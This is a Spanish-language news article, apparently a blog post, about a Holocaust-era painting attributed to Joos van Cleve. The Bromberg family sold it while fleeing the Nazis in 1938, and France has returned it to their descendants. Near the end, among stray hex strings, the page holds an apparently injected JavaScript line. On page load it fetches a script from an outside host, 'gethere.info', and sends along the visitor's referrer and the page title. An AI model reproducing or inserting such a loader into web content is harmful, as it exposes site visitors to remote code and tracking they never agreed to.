Pintura del holocausto regresa a su hogar

Una pareja judía que huía de los Nazis vendió la obra en 1938

Henry y Hertha Bromberg escaparon de Alemania, perseguidos por los Nazis. Al llegar a París, en 1938, vendieron una pintura para poder subsistir. Ésta se perdió con el tiempo, pero ahora ha regresado a manos de sus familiares.

Tuvieron que pasar 77 años para que la obra, que se dice fue realizada por el holandés Joos van Cleve, estuviera en manos de la nieta de aquellos judíos, Henrietta Schubert y su primo Christopher Bromberg. Para ellos, el valor de la obra no se mide ya en dinero.

“La pintura ni siquiera tiene valor monetario alguno”, dijo Christopher a Assiociated Press, en el evento en el que Francia devolvió la obra, considerada después de la Segunda Guerra Mundial, como una de las cerca de 2 mil obras “huérfanas” que quedaron en ese país. “Trata sobre conectarnos con nuestro pasado y la historia de nuestra familia que se perdió”, agregó Christopher.

La pintura data del siglo 16 y fue comprada por el padre de Henry Bromberg en Berlín, en 1912. Su hijo y nuera la vendieron en Francia mientras intentaban llegar a Estados Unidos huyendo de los Nazis. Posteriormente, antes de ser recuperada, la pintura fue vendida al gobierno alemán, con la intención de llevarse a la tierra natal de Adolf Hitler. En 1945 fue recuperada por los aliados.

2280ab58b4c44412b914337bc6fc9704

 

583d085c1a00000b03cca2ba

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado